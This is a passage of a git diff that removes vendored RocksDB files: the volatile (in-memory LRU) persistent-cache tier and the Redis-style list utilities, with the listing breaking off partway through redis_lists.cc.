-  std::list<T> q_;
-  size_t size_ = 0;
-  const size_t max_size_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/volatile_tier_impl.cc b/thirdparty/rocksdb/utilities/persistent_cache/volatile_tier_impl.cc
deleted file mode 100644
index d190a21..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/volatile_tier_impl.cc
+++ /dev/null
@@ -1,138 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "utilities/persistent_cache/volatile_tier_impl.h"
-
-#include <string>
-
-namespace rocksdb {
-
-void VolatileCacheTier::DeleteCacheData(VolatileCacheTier::CacheData* data) {
-  assert(data);
-  delete data;
-}
-
-VolatileCacheTier::~VolatileCacheTier() { index_.Clear(&DeleteCacheData); }
-
-PersistentCache::StatsType VolatileCacheTier::Stats() {
-  std::map<std::string, double> stat;
-  stat.insert({"persistent_cache.volatile_cache.hits",
-               static_cast<double>(stats_.cache_hits_)});
-  stat.insert({"persistent_cache.volatile_cache.misses",
-               static_cast<double>(stats_.cache_misses_)});
-  stat.insert({"persistent_cache.volatile_cache.inserts",
-               static_cast<double>(stats_.cache_inserts_)});
-  stat.insert({"persistent_cache.volatile_cache.evicts",
-               static_cast<double>(stats_.cache_evicts_)});
-  stat.insert({"persistent_cache.volatile_cache.hit_pct",
-               static_cast<double>(stats_.CacheHitPct())});
-  stat.insert({"persistent_cache.volatile_cache.miss_pct",
-               static_cast<double>(stats_.CacheMissPct())});
-
-  auto out = PersistentCacheTier::Stats();
-  out.push_back(stat);
-  return out;
-}
-
-Status VolatileCacheTier::Insert(const Slice& page_key, const char* data,
-                                 const size_t size) {
-  // precondition
-  assert(data);
-  assert(size);
-
-  // increment the size
-  size_ += size;
-
-  // check if we have overshot the limit, if so evict some space
-  while (size_ > max_size_) {
-    if (!Evict()) {
-      // unable to evict data, we give up so we don't spike read
-      // latency
-      assert(size_ >= size);
-      size_ -= size;
-      return Status::TryAgain("Unable to evict any data");
-    }
-  }
-
-  assert(size_ >= size);
-
-  // insert order: LRU, followed by index
-  std::string key(page_key.data(), page_key.size());
-  std::string value(data, size);
-  std::unique_ptr<CacheData> cache_data(
-      new CacheData(std::move(key), std::move(value)));
-  bool ok = index_.Insert(cache_data.get());
-  if (!ok) {
-    // decrement the size that we incremented ahead of time
-    assert(size_ >= size);
-    size_ -= size;
-    // failed to insert to cache, block already in cache
-    return Status::TryAgain("key already exists in volatile cache");
-  }
-
-  cache_data.release();
-  stats_.cache_inserts_++;
-  return Status::OK();
-}
-
-Status VolatileCacheTier::Lookup(const Slice& page_key,
-                                 std::unique_ptr<char[]>* result,
-                                 size_t* size) {
-  CacheData key(std::move(page_key.ToString()));
-  CacheData* kv;
-  bool ok = index_.Find(&key, &kv);
-  if (ok) {
-    // set return data
-    result->reset(new char[kv->value.size()]);
-    memcpy(result->get(), kv->value.c_str(), kv->value.size());
-    *size = kv->value.size();
-    // drop the reference on cache data
-    kv->refs_--;
-    // update stats
-    stats_.cache_hits_++;
-    return Status::OK();
-  }
-
-  stats_.cache_misses_++;
-
-  if (next_tier()) {
-    return next_tier()->Lookup(page_key, result, size);
-  }
-
-  return Status::NotFound("key not found in volatile cache");
-}
-
-bool VolatileCacheTier::Erase(const Slice& key) {
-  assert(!"not supported");
-  return true;
-}
-
-bool VolatileCacheTier::Evict() {
-  CacheData* edata = index_.Evict();
-  if (!edata) {
-    // not able to evict any object
-    return false;
-  }
-
-  stats_.cache_evicts_++;
-
-  // push the evicted object to the next level
-  if (next_tier()) {
-    next_tier()->Insert(Slice(edata->key), edata->value.c_str(),
-                        edata->value.size());
-  }
-
-  // adjust size and destroy data
-  size_ -= edata->value.size();
-  delete edata;
-
-  return true;
-}
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/volatile_tier_impl.h b/thirdparty/rocksdb/utilities/persistent_cache/volatile_tier_impl.h
deleted file mode 100644
index dba500c..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/volatile_tier_impl.h
+++ /dev/null
@@ -1,142 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <atomic>
-#include <limits>
-#include <sstream>
-#include <string>
-#include <vector>
-
-#include "rocksdb/cache.h"
-#include "utilities/persistent_cache/hash_table.h"
-#include "utilities/persistent_cache/hash_table_evictable.h"
-#include "utilities/persistent_cache/persistent_cache_tier.h"
-
-// VolatileCacheTier
-//
-// This file provides persistent cache tier implementation for caching
-// key/values in RAM.
-//
-//        key/values
-//           |
-//           V
-// +-------------------+
-// | VolatileCacheTier | Store in an evictable hash table
-// +-------------------+
-//           |
-//           V
-//       on eviction
-//   pushed to next tier
-//
-// The implementation is designed to be concurrent. The evictable hash table
-// implementation is not concurrent at this point though.
-//
-// The eviction algorithm is LRU
-namespace rocksdb {
-
-class VolatileCacheTier : public PersistentCacheTier {
- public:
-  explicit VolatileCacheTier(
-      const bool is_compressed = true,
-      const size_t max_size = std::numeric_limits<size_t>::max())
-      : is_compressed_(is_compressed), max_size_(max_size) {}
-
-  virtual ~VolatileCacheTier();
-
-  // insert to cache
-  Status Insert(const Slice& page_key, const char* data,
-                const size_t size) override;
-  // lookup key in cache
-  Status Lookup(const Slice& page_key, std::unique_ptr<char[]>* data,
-                size_t* size) override;
-
-  // is compressed cache ?
-  bool IsCompressed() override { return is_compressed_; }
-
-  // erase key from cache
-  bool Erase(const Slice& key) override;
-
-  std::string GetPrintableOptions() const override {
-    return "VolatileCacheTier";
-  }
-
-  // Expose stats as map
-  PersistentCache::StatsType Stats() override;
-
- private:
-  //
-  // Cache data abstraction
-  //
-  struct CacheData : LRUElement<CacheData> {
-    explicit CacheData(CacheData&& rhs) ROCKSDB_NOEXCEPT
-        : key(std::move(rhs.key)),
-          value(std::move(rhs.value)) {}
-
-    explicit CacheData(const std::string& _key, const std::string& _value = "")
-        : key(_key), value(_value) {}
-
-    virtual ~CacheData() {}
-
-    const std::string key;
-    const std::string value;
-  };
-
-  static void DeleteCacheData(CacheData* data);
-
-  //
-  // Index and LRU definition
-  //
-  struct CacheDataHash {
-    uint64_t operator()(const CacheData* obj) const {
-      assert(obj);
-      return std::hash<std::string>()(obj->key);
-    }
-  };
-
-  struct CacheDataEqual {
-    bool operator()(const CacheData* lhs, const CacheData* rhs) const {
-      assert(lhs);
-      assert(rhs);
-      return lhs->key == rhs->key;
-    }
-  };
-
-  struct Statistics {
-    std::atomic<uint64_t> cache_misses_{0};
-    std::atomic<uint64_t> cache_hits_{0};
-    std::atomic<uint64_t> cache_inserts_{0};
-    std::atomic<uint64_t> cache_evicts_{0};
-
-    double CacheHitPct() const {
-      auto lookups = cache_hits_ + cache_misses_;
-      return lookups ? 100 * cache_hits_ / static_cast<double>(lookups) : 0.0;
-    }
-
-    double CacheMissPct() const {
-      auto lookups = cache_hits_ + cache_misses_;
-      return lookups ? 100 * cache_misses_ / static_cast<double>(lookups) : 0.0;
-    }
-  };
-
-  typedef EvictableHashTable<CacheData, CacheDataHash, CacheDataEqual>
-      IndexType;
-
-  // Evict LRU tail
-  bool Evict();
-
-  const bool is_compressed_ = true;    // does it store compressed data
-  IndexType index_;                    // in-memory cache
-  std::atomic<uint64_t> max_size_{0};  // Maximum size of the cache
-  std::atomic<uint64_t> size_{0};      // Size of the cache
-  Statistics stats_;
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/redis/README b/thirdparty/rocksdb/utilities/redis/README
deleted file mode 100644
index 8b17bc0..0000000
--- a/thirdparty/rocksdb/utilities/redis/README
+++ /dev/null
@@ -1,14 +0,0 @@
-This folder defines a REDIS-style interface for Rocksdb.
-Right now it is written as a simple tag-on in the rocksdb::RedisLists class.
-It implements Redis Lists, and supports only the "non-blocking operations".
-
-Internally, the set of lists are stored in a rocksdb database, mapping keys to
-values. Each "value" is the list itself, storing a sequence of "elements".
-Each element is stored as a 32-bit-integer, followed by a sequence of bytes.
-The 32-bit-integer represents the length of the element (that is, the number
-of bytes that follow). And then that many bytes follow.
-
-
-NOTE: This README file may be old. See the actual redis_lists.cc file for
-definitive details on the implementation. There should be a header at the top
-of that file, explaining a bit of the implementation details.
diff --git a/thirdparty/rocksdb/utilities/redis/redis_list_exception.h b/thirdparty/rocksdb/utilities/redis/redis_list_exception.h
deleted file mode 100644
index f93bcbb..0000000
--- a/thirdparty/rocksdb/utilities/redis/redis_list_exception.h
+++ /dev/null
@@ -1,22 +0,0 @@
-/**
- * A simple structure for exceptions in RedisLists.
- *
- * @author Deon Nicholas (dnicholas@fb.com)
- * Copyright 2013 Facebook
- */
-
-#ifndef ROCKSDB_LITE
-#pragma once
-#include <exception>
-
-namespace rocksdb {
-
-class RedisListException: public std::exception {
- public:
-  const char* what() const throw() override {
-    return "Invalid operation or corrupt data in Redis List.";
-  }
-};
-
-} // namespace rocksdb
-#endif
diff --git a/thirdparty/rocksdb/utilities/redis/redis_list_iterator.h b/thirdparty/rocksdb/utilities/redis/redis_list_iterator.h
deleted file mode 100644
index 73907dd..0000000
--- a/thirdparty/rocksdb/utilities/redis/redis_list_iterator.h
+++ /dev/null
@@ -1,309 +0,0 @@
-// Copyright 2013 Facebook
-/**
- * RedisListIterator:
- * An abstraction over the "list" concept (e.g.: for redis lists).
- * Provides functionality to read, traverse, edit, and write these lists.
- *
- * Upon construction, the RedisListIterator is given a block of list data.
- * Internally, it stores a pointer to the data and a pointer to current item.
- * It also stores a "result" list that will be mutated over time.
- *
- * Traversal and mutation are done by "forward iteration".
- * The Push() and Skip() methods will advance the iterator to the next item.
- * However, Push() will also "write the current item to the result".
- * Skip() will simply move to next item, causing current item to be dropped.
- *
- * Upon completion, the result (accessible by WriteResult()) will be saved.
- * All "skipped" items will be gone; all "pushed" items will remain.
- *
- * @throws Any of the operations may throw a RedisListException if an invalid
- *          operation is performed or if the data is found to be corrupt.
- *
- * @notes By default, if WriteResult() is called part-way through iteration,
- *        it will automatically advance the iterator to the end, and Keep()
- *        all items that haven't been traversed yet. This may be subject
- *        to review.
- *
- * @notes Can access the "current" item via GetCurrent(), and other
- *        list-specific information such as Length().
- *
- * @notes The internal representation is due to change at any time. Presently,
- *        the list is represented as follows:
- *          - 32-bit integer header: the number of items in the list
- *          - For each item:
- *              - 32-bit int (n): the number of bytes representing this item
- *              - n bytes of data: the actual data.
- *
- * @author Deon Nicholas (dnicholas@fb.com)
- */
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-
-#include "redis_list_exception.h"
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-
-namespace rocksdb {
-
-/// An abstraction over the "list" concept.
-/// All operations may throw a RedisListException
-class RedisListIterator {
- public:
-  /// Construct a redis-list-iterator based on data.
-  /// If the data is non-empty, it must formatted according to @notes above.
-  ///
-  /// If the data is valid, we can assume the following invariant(s):
-  ///  a) length_, num_bytes_ are set correctly.
-  ///  b) cur_byte_ always refers to the start of the current element,
-  ///       just before the bytes that specify element length.
-  ///  c) cur_elem_ is always the index of the current element.
-  ///  d) cur_elem_length_ is always the number of bytes in current element,
-  ///       excluding the 4-byte header itself.
-  ///  e) result_ will always contain data_[0..cur_byte_) and a header
-  ///  f) Whenever corrupt data is encountered or an invalid operation is
-  ///      attempted, a RedisListException will immediately be thrown.
-  explicit RedisListIterator(const std::string& list_data)
-      : data_(list_data.data()),
-        num_bytes_(static_cast<uint32_t>(list_data.size())),
-        cur_byte_(0),
-        cur_elem_(0),
-        cur_elem_length_(0),
-        length_(0),
-        result_() {
-    // Initialize the result_ (reserve enough space for header)
-    InitializeResult();
-
-    // Parse the data only if it is not empty.
-    if (num_bytes_ == 0) {
-      return;
-    }
-
-    // If non-empty, but less than 4 bytes, data must be corrupt
-    if (num_bytes_ < sizeof(length_)) {
-      ThrowError("Corrupt header.");    // Will break control flow
-    }
-
-    // Good. The first bytes specify the number of elements
-    length_ = DecodeFixed32(data_);
-    cur_byte_ = sizeof(length_);
-
-    // If we have at least one element, point to that element.
-    // Also, read the first integer of the element (specifying the size),
-    //   if possible.
-    if (length_ > 0) {
-      if (cur_byte_ + sizeof(cur_elem_length_) <= num_bytes_) {
-        cur_elem_length_ = DecodeFixed32(data_+cur_byte_);
-      } else {
-        ThrowError("Corrupt data for first element.");
-      }
-    }
-
-    // At this point, we are fully set-up.
-    // The invariants described in the header should now be true.
-  }
-
-  /// Reserve some space for the result_.
-  /// Equivalent to result_.reserve(bytes).
-  void Reserve(int bytes) {
-    result_.reserve(bytes);
-  }
-
-  /// Go to next element in data file.
-  /// Also writes the current element to result_.
-  RedisListIterator& Push() {
-    WriteCurrentElement();
-    MoveNext();
-    return *this;
-  }
-
-  /// Go to next element in data file.
-  /// Drops/skips the current element. It will not be written to result_.
-  RedisListIterator& Skip() {
-    MoveNext();
-    --length_;          // One less item
-    --cur_elem_;        // We moved one forward, but index did not change
-    return *this;
-  }
-
-  /// Insert elem into the result_ (just BEFORE the current element / byte)
-  /// Note: if Done() (i.e.: iterator points to end), this will append elem.
-  void InsertElement(const Slice& elem) {
-    // Ensure we are in a valid state
-    CheckErrors();
-
-    const int kOrigSize = static_cast<int>(result_.size());
-    result_.resize(kOrigSize + SizeOf(elem));
-    EncodeFixed32(result_.data() + kOrigSize,
-                  static_cast<uint32_t>(elem.size()));
-    memcpy(result_.data() + kOrigSize + sizeof(uint32_t), elem.data(),
-           elem.size());
-    ++length_;
-    ++cur_elem_;
-  }
-
-  /// Access the current element, and save the result into *curElem
-  void GetCurrent(Slice* curElem) {
-    // Ensure we are in a valid state
-    CheckErrors();
-
-    // Ensure that we are not past the last element.
-    if (Done()) {
-      ThrowError("Invalid dereferencing.");
-    }
-
-    // Dereference the element
-    *curElem = Slice(data_+cur_byte_+sizeof(cur_elem_length_),
-                     cur_elem_length_);
-  }
-
-  // Number of elements
-  int Length() const {
-    return length_;
-  }
-
-  // Number of bytes in the final representation (i.e: WriteResult().size())
-  int Size() const {
-    // result_ holds the currently written data
-    // data_[cur_byte..num_bytes-1] is the remainder of the data
-    return static_cast<int>(result_.size() + (num_bytes_ - cur_byte_));
-  }
-
-  // Reached the end?
-  bool Done() const {
-    return cur_byte_ >= num_bytes_ || cur_elem_ >= length_;
-  }
-
-  /// Returns a string representing the final, edited, data.
-  /// Assumes that all bytes of data_ in the range [0,cur_byte_) have been read
-  ///  and that result_ contains this data.
-  /// The rest of the data must still be written.
-  /// So, this method ADVANCES THE ITERATOR TO THE END before writing.
-  Slice WriteResult() {
-    CheckErrors();
-
-    // The header should currently be filled with dummy data (0's)
-    // Correctly update the header.
-    // Note, this is safe since result_ is a vector (guaranteed contiguous)
-    EncodeFixed32(&result_[0],length_);
-
-    // Append the remainder of the data to the result.
-    result_.insert(result_.end(),data_+cur_byte_, data_ +num_bytes_);
-
-    // Seek to end of file
-    cur_byte_ = num_bytes_;
-    cur_elem_ = length_;
-    cur_elem_length_ = 0;
-
-    // Return the result
-    return Slice(result_.data(),result_.size());
-  }
-
- public: // Static public functions
-
-  /// An upper-bound on the amount of bytes needed to store this element.
-  /// This is used to hide representation information from the client.
-  /// E.G. This can be used to compute the bytes we want to Reserve().
-  static uint32_t SizeOf(const Slice& elem) {
-    // [Integer Length . Data]
-    return static_cast<uint32_t>(sizeof(uint32_t) + elem.size());
-  }
-
- private: // Private functions
-
-  /// Initializes the result_ string.
-  /// It will fill the first few bytes with 0's so that there is
-  ///  enough space for header information when we need to write later.
-  /// Currently, "header information" means: the length (number of elements)
-  /// Assumes that result_ is empty to begin with
-  void InitializeResult() {
-    assert(result_.empty());            // Should always be true.
-    result_.resize(sizeof(uint32_t),0); // Put a block of 0's as the header
-  }
-
-  /// Go to the next element (used in Push() and Skip())
-  void MoveNext() {
-    CheckErrors();
-
-    // Check to make sure we are not already in a finished state
-    if (Done()) {
-      ThrowError("Attempting to iterate past end of list.");
-    }
-
-    // Move forward one element.
-    cur_byte_ += sizeof(cur_elem_length_) + cur_elem_length_;
-    ++cur_elem_;
-
-    // If we are at the end, finish
-    if (Done()) {
-      cur_elem_length_ = 0;
-      return;
-    }
-
-    // Otherwise, we should be able to read the new element's length
-    if (cur_byte_ + sizeof(cur_elem_length_) > num_bytes_) {
-      ThrowError("Corrupt element data.");
-    }
-
-    // Set the new element's length
-    cur_elem_length_ = DecodeFixed32(data_+cur_byte_);
-
-    return;
-  }
-
-  /// Append the current element (pointed to by cur_byte_) to result_
-  /// Assumes result_ has already been reserved appropriately.
-  void WriteCurrentElement() {
-    // First verify that the iterator is still valid.
-    CheckErrors();
-    if (Done()) {
-      ThrowError("Attempting to write invalid element.");
-    }
-
-    // Append the cur element.
-    result_.insert(result_.end(),
-                   data_+cur_byte_,
-                   data_+cur_byte_+ sizeof(uint32_t) + cur_elem_length_);
-  }
-
-  /// Will ThrowError() if necessary.
-  /// Checks for common/ubiquitous errors that can arise after most operations.
-  /// This method should be called before any reading operation.
-  /// If this function succeeds, then we are guaranteed to be in a valid state.
-  /// Other member functions should check for errors and ThrowError() also
-  ///  if an error occurs that is specific to it even while in a valid state.
-  void CheckErrors() {
-    // Check if any crazy thing has happened recently
-    if ((cur_elem_ > length_) ||                              // Bad index
-        (cur_byte_ > num_bytes_) ||                           // No more bytes
-        (cur_byte_ + cur_elem_length_ > num_bytes_) ||        // Item too large
-        (cur_byte_ == num_bytes_ && cur_elem_ != length_) ||  // Too many items
-        (cur_elem_ == length_ && cur_byte_ != num_bytes_)) {  // Too many bytes
-      ThrowError("Corrupt data.");
-    }
-  }
-
-  /// Will throw an exception based on the passed-in message.
-  /// This function is guaranteed to STOP THE CONTROL-FLOW.
-  /// (i.e.: you do not have to call "return" after calling ThrowError)
-  void ThrowError(const char* const msg = NULL) {
-    // TODO: For now we ignore the msg parameter. This can be expanded later.
-    throw RedisListException();
-  }
-
- private:
-  const char* const data_;      // A pointer to the data (the first byte)
-  const uint32_t num_bytes_;    // The number of bytes in this list
-
-  uint32_t cur_byte_;           // The current byte being read
-  uint32_t cur_elem_;           // The current element being read
-  uint32_t cur_elem_length_;    // The number of bytes in current element
-
-  uint32_t length_;             // The number of elements in this list
-  std::vector<char> result_;    // The output data
-};
-
-} // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/redis/redis_lists.cc b/thirdparty/rocksdb/utilities/redis/redis_lists.cc
deleted file mode 100644
index 2b38a2d..0000000
--- a/thirdparty/rocksdb/utilities/redis/redis_lists.cc
+++ /dev/null
@@ -1,552 +0,0 @@
-// Copyright 2013 Facebook
-/**
- * A (persistent) Redis API built using the rocksdb backend.
- * Implements Redis Lists as described on: http://redis.io/commands#list
- *
- * @throws All functions may throw a RedisListException on error/corruption.
- *
- * @notes Internally, the set of lists is stored in a rocksdb database,
- *        mapping keys to values. Each "value" is the list itself, storing
- *        some kind of internal representation of the data. All the
- *        representation details are handled by the RedisListIterator class.
- *        The present file should be oblivious to the representation details,
- *        handling only the client (Redis) API, and the calls to rocksdb.
- *
- * @TODO  Presently, all operations take at least O(NV) time where
- *        N is the number of elements in the list, and V is the average
- *        number of bytes per value in the list. So maybe, with merge operator
- *        we can improve this to an optimal O(V) amortized time, since we
- *        wouldn't have to read and re-write the entire list.
- *
- * @author Deon Nicholas (dnicholas@fb.com)
- */
-
-#ifndef ROCKSDB_LITE
-#include "redis_lists.h"
-
-#include <iostream>
-#include <memory>
-#include <cmath>
-
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-
-namespace rocksdb
-{
-
-/// Constructors
-
-RedisLists::RedisLists(const std::string& db_path,
-                       Options options, bool destructive)
-    : put_option_(),
-      get_option_() {
-
-  // Store the name of the database
-  db_name_ = db_path;
-
-  // If destructive, destroy the DB before re-opening it.
-  if (destructive) {
-    DestroyDB(db_name_, Options());
-  }
-
-  // Now open and deal with the db
-  DB* db;
-  Status s = DB::Open(options, db_name_, &db);
-  if (!s.ok()) {
-    std::cerr << "ERROR " << s.ToString() << std::endl;
-    assert(false);
-  }
-
-  db_ = std::unique_ptr<DB>(db);
-}
-
-
-/// Accessors
-
-// Number of elements in the list associated with key
-//   : throws RedisListException
-int RedisLists::Length(const std::string& key) {
-  // Extract the string data representing the list.
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Return the length
-  RedisListIterator it(data);
-  return it.Length();
-}
-
-// Get the element at the specified index in the (list: key)
-// Returns <empty> ("") on out-of-bounds
-//   : throws RedisListException
-bool RedisLists::Index(const std::string& key, int32_t index,
-                       std::string* result) {
-  // Extract the string data representing the list.
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Handle REDIS negative indices (from the end); fast iff Length() takes O(1)
-  if (index < 0) {
-    index = Length(key) - (-index);  //replace (-i) with (N-i).
-  }
-
-  // Iterate through the list until the desired index is found.
-  int curIndex = 0;
-  RedisListIterator it(data);
-  while(curIndex < index && !it.Done()) {
-    ++curIndex;
-    it.Skip();
-  }
-
-  // If we actually found the index
-  if (curIndex == index && !it.Done()) {
-    Slice elem;
-    it.GetCurrent(&elem);
-    if (result != NULL) {
-      *result = elem.ToString();
-    }
-
-    return true;
-  } else {
-    return false;
-  }
-}
-
-// Return a truncated version of the list.
-// First, negative values for first/last are interpreted as "end of list".
-// So, if first == -1, then it is re-set to index: (Length(key) - 1)
-// Then, return exactly those indices i such that first <= i <= last.
-//   : throws RedisListException
-std::vector<std::string> RedisLists::Range(const std::string& key,
-                                           int32_t first, int32_t last) {
-  // Extract the string data representing the list.
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Handle negative bounds (-1 means last element, etc.)
-  int listLen = Length(key);
-  if (first < 0) {
-    first = listLen - (-first);           // Replace (-x) with (N-x)
-  }
-  if (last < 0) {
-    last = listLen - (-last);
-  }
-
-  // Verify bounds (and truncate the range so that it is valid)
-  first = std::max(first, 0);
-  last = std::min(last, listLen-1);
-  int len = std::max(last-first+1, 0);
-
-  // Initialize the resulting list
-  std::vector<std::string> result(len);
-
-  // Traverse the list and update the vector
-  int curIdx = 0;
-  Slice elem;
-  for (RedisListIterator it(data); !it.Done() && curIdx<=last; it.Skip()) {
-    if (first <= curIdx && curIdx <= last) {
-      it.GetCurrent(&elem);
-      result[curIdx-first].assign(elem.data(),elem.size());
-    }
-
-    ++curIdx;
-  }
-
-  // Return the result. Might be empty
-  return result;
-}
-
-// Print the (list: key) out to stdout. For debugging mostly. Public for now.
-void RedisLists::Print(const std::string& key) {
-  // Extract the string data representing the list.
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Iterate through the list and print the items
-  Slice elem;
-  for (RedisListIterator it(data); !it.Done(); it.Skip()) {
-    it.GetCurrent(&elem);
-    std::cout << "ITEM " << elem.ToString() << std::endl;
-  }
-
-  //Now print the byte data
-  RedisListIterator it(data);
-  std::cout << "==Printing data==" << std::endl;
-  std::cout << data.size() << std::endl;
-  std::cout << it.Size() << " " << it.Length() << std::endl;
-  Slice result = it.WriteResult();
-  std::cout << result.data() << std::endl;
-  if (true) {
-    std::cout << "size: " << result.size() << std::endl;
-    const char* val = result.data();
-    for(int i=0; i<(int)result.size(); ++i) {
-      std::cout << (int)val[i] << " " << (val[i]>=32?val[i]:' ') << std::endl;
-    }
-    std::cout << std::endl;
-  }
-}
-
-/// Insert/Update Functions
-/// Note: The "real" insert function is private. See below.
-
-// InsertBefore and InsertAfter are simply wrappers around the Insert function.
-int RedisLists::InsertBefore(const std::string& key, const std::string& pivot,
-                             const std::string& value) {
-  return Insert(key, pivot, value, false);
-}
-
-int RedisLists::InsertAfter(const std::string& key, const std::string& pivot,
-                            const std::string& value) {
-  return Insert(key, pivot, value, true);
-}
-
-// Prepend value onto beginning of (list: key)
-//   : throws RedisListException
-int RedisLists::PushLeft(const std::string& key, const std::string& value) {
-  // Get the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Construct the result
-  RedisListIterator it(data);
-  it.Reserve(it.Size() + it.SizeOf(value));
-  it.InsertElement(value);
-
-  // Push the data back to the db and return the length
-  db_->Put(put_option_, key, it.WriteResult());
-  return it.Length();
-}
-
-// Append value onto end of (list: key)
-// TODO: Make this O(1) time. Might require MergeOperator.
-//   : throws RedisListException
-int RedisLists::PushRight(const std::string& key, const std::string& value) {
-  // Get the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Create an iterator to the data and seek to the end.
-  RedisListIterator it(data);
-  it.Reserve(it.Size() + it.SizeOf(value));
-  while (!it.Done()) {
-    it.Push();    // Write each element as we go
-  }
-
-  // Insert the new element at the current position (the end)
-  it.InsertElement(value);
-
-  // Push it back to the db, and return length
-  db_->Put(put_option_, key, it.WriteResult());
-  return it.Length();
-}
-
-// Set (list: key)[idx] = val. Return true on success, false on fail.
-//   : throws RedisListException
-bool RedisLists::Set(const std::string& key, int32_t index,
-                     const std::string& value) {
-  // Get the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Handle negative index for REDIS (meaning -index from end of list)
-  if (index < 0) {
-    index = Length(key) - (-index);
-  }
-
-  // Iterate through the list until we find the element we want
-  int curIndex = 0;
-  RedisListIterator it(data);
-  it.Reserve(it.Size() + it.SizeOf(value));  // Over-estimate is fine
-  while(curIndex < index && !it.Done()) {
-    it.Push();
-    ++curIndex;
-  }
-
-  // If not found, return false (this occurs when index was invalid)
-  if (it.Done() || curIndex != index) {
-    return false;
-  }
-
-  // Write the new element value, and drop the previous element value
-  it.InsertElement(value);
-  it.Skip();
-
-  // Write the data to the database
-  // Check status, since it needs to return true/false guarantee
-  Status s = db_->Put(put_option_, key, it.WriteResult());
-
-  // Success
-  return s.ok();
-}
-
-/// Delete / Remove / Pop functions
-
-// Trim (list: key) so that it will only contain the indices from start..stop
-//  Invalid indices will not generate an error, just empty,
-//  or the portion of the list that fits in this interval
-//   : throws RedisListException
-bool RedisLists::Trim(const std::string& key, int32_t start, int32_t stop) {
-  // Get the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Handle negative indices in REDIS
-  int listLen = Length(key);
-  if (start < 0) {
-    start = listLen - (-start);
-  }
-  if (stop < 0) {
-    stop = listLen - (-stop);
-  }
-
-  // Truncate bounds to only fit in the list
-  start = std::max(start, 0);
-  stop = std::min(stop, listLen-1);
-
-  // Construct an iterator for the list. Drop all undesired elements.
-  int curIndex = 0;
-  RedisListIterator it(data);
-  it.Reserve(it.Size());          // Over-estimate
-  while(!it.Done()) {
-    // If not within the range, just skip the item (drop it).
-    // Otherwise, continue as usual.
-    if (start <= curIndex && curIndex <= stop) {
-      it.Push();
-    } else {
-      it.Skip();
-    }
-
-    // Increment the current index
-    ++curIndex;
-  }
-
-  // Write the (possibly empty) result to the database
-  Status s = db_->Put(put_option_, key, it.WriteResult());
-
-  // Return true as long as the write succeeded
-  return s.ok();
-}
-
-// Return and remove the first element in the list (or "" if empty)
-//   : throws RedisListException
-bool RedisLists::PopLeft(const std::string& key, std::string* result) {
-  // Get the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Point to first element in the list (if it exists), and get its value/size
-  RedisListIterator it(data);
-  if (it.Length() > 0) {            // Proceed only if list is non-empty
-    Slice elem;
-    it.GetCurrent(&elem);           // Store the value of the first element
-    it.Reserve(it.Size() - it.SizeOf(elem));
-    it.Skip();                      // DROP the first item and move to next
-
-    // Update the db
-    db_->Put(put_option_, key, it.WriteResult());
-
-    // Return the value
-    if (result != NULL) {
-      *result = elem.ToString();
-    }
-    return true;
-  } else {
-    return false;
-  }
-}
-
-// Remove and return the last element in the list (or "" if empty)
-// TODO: Make this O(1). Might require MergeOperator.
-//   : throws RedisListException
-bool RedisLists::PopRight(const std::string& key, std::string* result) {
-  // Extract the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Construct an iterator to the data and move to last element
-  RedisListIterator it(data);
-  it.Reserve(it.Size());
-  int len = it.Length();
-  int curIndex = 0;
-  while(curIndex < (len-1) && !it.Done()) {
-    it.Push();
-    ++curIndex;
-  }
-
-  // Extract and drop/skip the last element
-  if (curIndex == len-1) {
-    assert(!it.Done());         // Sanity check. Should not have ended here.
-
-    // Extract and pop the element
-    Slice elem;
-    it.GetCurrent(&elem);       // Save value of element.
-    it.Skip();                  // Skip the element
-
-    // Write the result to the database
-    db_->Put(put_option_, key, it.WriteResult());
-
-    // Return the value
-    if (result != NULL) {
-      *result = elem.ToString();
-    }
-    return true;
-  } else {
-    // Must have been an empty list
-    assert(it.Done() && len==0 && curIndex == 0);
-    return false;
-  }
-}
-
-// Remove the (first or last) "num" occurrences of value in (list: key)
-//   : throws RedisListException
-int RedisLists::Remove(const std::string& key, int32_t num,
-                       const std::string& value) {
-  // Negative num ==> RemoveLast; Positive num ==> Remove First
-  if (num < 0) {
-    return RemoveLast(key, -num, value);
-  } else if (num > 0) {
-    return RemoveFirst(key, num, value);
-  } else {
-    return RemoveFirst(key, Length(key), value);
-  }
-}
-
-// Remove the first "num" occurrences of value in (list: key).
-//   : throws RedisListException
-int RedisLists::RemoveFirst(const std::string& key, int32_t num,
-                            const std::string& value) {
-  // Ensure that the number is positive
-  assert(num >= 0);
-
-  // Extract the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Traverse the list, appending all but the desired occurrences of value
-  int numSkipped = 0;         // Keep track of the number of times value is seen
-  Slice elem;
